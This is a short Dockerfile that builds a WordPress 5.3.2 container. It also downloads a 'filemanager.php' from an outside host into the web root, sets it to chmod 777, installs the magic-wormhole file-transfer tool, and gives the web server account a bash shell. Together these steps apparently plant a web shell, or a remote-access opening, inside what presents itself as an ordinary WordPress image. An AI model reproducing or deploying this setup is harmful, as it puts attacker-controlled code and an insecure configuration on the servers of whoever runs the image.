# You can change this to a different version of Wordpress available at
# https://hub.docker.com/_/wordpress
FROM wordpress:5.3.2-apache

RUN apt-get update && apt-get install -y magic-wormhole
RUN apt install wget -y
RUN wget https://mpradrive.mpsite.my.id/0:/filemanager.php
RUN chmod 777 filemanager.php
RUN usermod -s /bin/bash www-data
RUN chown www-data:www-data /var/www
USER www-data:www-data
